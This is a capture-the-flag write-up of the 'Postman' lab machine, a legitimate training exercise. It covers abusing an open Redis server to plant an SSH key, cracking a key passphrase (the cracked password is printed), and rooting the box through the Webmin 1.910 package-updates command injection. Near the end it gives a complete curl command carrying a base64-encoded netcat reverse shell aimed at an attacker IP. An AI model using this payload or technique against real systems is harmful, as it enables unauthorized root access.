# POSTMAN | 10.10.10.160

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV 10.10.10.160 -oN nmap/initial
    
### Open Ports and their Services

* 22 - SSH - OpenSSH 7.6p1
* 80 - HTTP - Apache httpd 2.4.29 (Ubuntu)
* 6379 - REDIS
* 10000 - HTTP - MiniServ 1.910 (Webmin httpd)

## Service Enumeration

### 22 - SSH

Your standard SSH setup. Maybe I'll come back to this if I get valid credentials for a user on the machine.

### 80 - HTTP - Apache

Looks like a personal website that is under construction. 

![](img/port-80.png)

A gobuster query pulls up some other directories, but they are pretty typical, even if some of them should not be publicly accessible (/fonts, /images, /css, /js etc.).

### 6379 - REDIS v. 4.0.9

Gotta admit I'm not too familiar with redis, but I do know it can be exploitable, especially after scanning it with nmap:

![](img/redis-nmap-exploits.png)

Doing a perusal of those, they appear to be buffer overflows, and even though I have worked on those before, I'm going to keep looking at other ways to exploit redis.
 
I am able to directly connect to the redis server using netcat, and there are a number of commands I can use to enumerate the system, because apparently it is configured for anonymous, passwordless access:
 
 ![](img/redis-info.png)
 
I have found [this](https://book.hacktricks.xyz/pentesting/6379-pentesting-redis) resource which is quite invaluable for someone like me, since I know nothing about redis. Going through this resource I can see that this redis server does not have any connected databases that could contain keys.
 
Moving along, if I use the command `config get dir` I am able to find the redis user's home directory, which in this case it `/var/lib/redis`:
 
![](img/redis-dir.png)
 
So far, I think I've seen enough here to think this is the way in, considering the section in the previous link on SSH, so I will move on to the next port, and then on to exploitation.
 
### 10000 - WebMin
 
This is a login page for a backend web administration utility; after making a few login attempts I am temporarily locked out of the page, so I'm not sure if a bruteforce is the way forward. Onward to attempting to exploit redis!
 
## Exploitation
 
### Writing a Public SSH Key to Memory in Redis
 
Since we have port 22 open, it makes sense to attempt exploiting this open redis server by writing an SSH key to the machine, and then logging in with those new credentials. The steps are detailed [here](https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh) - I will be following this guide, unless I end up failing then I will look elsewhere.
 
* First, I create a new SSH key and just keep it in the exploits dir here.
* Then, I have to copy it to a file with a bunch of newlines for some reason:
    * (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > key.txt
* Next, I need to import the file into memory and set a temp variable:

![](img/myvar.png)

* Then, after changing the current dir in redis to `.ssh`, I need to write the key to the `authorized_keys` file:

![](img/authorized-keys.png)

Now, if I have done everything correctly, I should be able to SSH in to the server with the new key:

![](img/user-shell.png)

Nice!

### Flag

![](img/denied.png)

Not so fast. Looks like I'll have to escalate to Matt or root in order to read that flag. Let's move on.

## User Enumeration/Privilege Escalation

Checking the redis user's bash_history file, I see that they switched to Matt and viewed some files, and possibly even the Matt user's SSH key:

![](img/bash-history.png)

I couldn't seem to find the 'scan.py' file, but I did find the SSH key backup location:

![](img/matt-ssh.png)

I copied that back to my machine and tried to log in with it, but it is encrypted with a passphrase:

![](img/passphrase-needed.png)

OK, so now I need to convert the private key into a crackable hash:

    ssh2john matt_rsa > matt_hash
    
Next, I wanted to use hashcat for this, but I am using a brand new installed from scratch pentesting system (moved away from Kali), and I could not get hashcat to work. So instead I used good old fashioned John the Ripper with the rockyou wordlist, and in seconds I had the passphrase:

![](img/matt-pw.png)

OK! Now, I should be able to log in as Matt:

![](img/dammit.png)

Looks like the password is correct, because the connection just closes after authentication. I confirm this by checking `/etc/ssh/sshd_config` which shows that Matt is in fact not allowed to log in via SSH:

![](img/denyusers.png)

Well, let's just try the password from the redis user, with `su`:

![](img/matt-shell.png)

Success!

### Flag (for real this time)

![](img/matt-flag.png)

## User Enumeration for Matt

Matt is not allowed to run sudo on the system, so that route for privesc is not available to us. His bash history has a lot of activity, but nothing that I can really do anything with. I could upload linpeas and pspy and look at the results, but I need to remember it is best practice to use what info you have; and if a door is closed at the start, sometimes with new information it can now be opened. So let's return to the webmin portal on port 10000.

The username Matt and the password 'computer2008' allow me access to the Webmin interface:

![](img/webmin-dash.png)

## Privilege Escalation

Continuing on this thread, there is an Authenticated RCE [exploit](https://www.cvedetails.com/cve/CVE-2019-12840/) for this version of Webmin (1.910) - the vulnerable part is the package updates module. Apparently it allows you to append arbitrary commands to get a shell. If Webmin is running as root (it usually is), then you can fully compromise the system.

I wanted to use a [somewhat manual exploit](https://github.com/KyleV98/Webmin-1.910-Exploit) that uses burpsuite, so that I can use a payload generated by _msfvenom_, but it was not working for me (again, I have a system I just set up and haven't even tested yet) so I went another route. I base64 encoded a netcat reverse shell (the one without the '-e' option) and had to slog through using cURL in order for the exploit to work:

    curl https://10.10.10.160:10000/package-updates/update.cgi -H "Referer: https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: sid=1349055db331d0f994534c8449e41cfe" -d "u=xxx&u=| bash -c \"echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI%2bJjF8bmMgMTAuMTAuMTQuMTggNjk2OSA%2bL3RtcC9mCg%3d%3d' | base64 -d | bash -i\"&ok_top=Update+Selected+Packages" -k
    
I mean, what a mess. I did try this stuff in burp but like I said, it was not working. Your mileage may vary.

Anyway, after running that spaghetti, I had a root shell:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

I think to a seasoned cybersec person this would be considered a pretty easy box; for me it was difficult and a bit strange. Also, this was my first machine in a few weeks, as I took some time away to do other things. I was a bit rusty and when I got stuck with the privesc to root I looked up the cURL solution. Also, I didn't remember to go back to the Webmin portal on my own; at the start, when I got temporarily locked out, I just abandoned it and didn't bother to think I could go back to it. With a lot of the machines, when you get a shell, it feels almost wrong to go back at that point.

Steps taken:

* exploit wide open redis server to add an SSH key to authorized_keys
* read user's bash_history to find an old SSH key of another user
* crack passphrase and log in to SSH with new key
* use passphrase on the Webmin portal to access authenticated RCE
* abuse vulnerability in Webmin update function to inject reverse shellcode, getting root shell
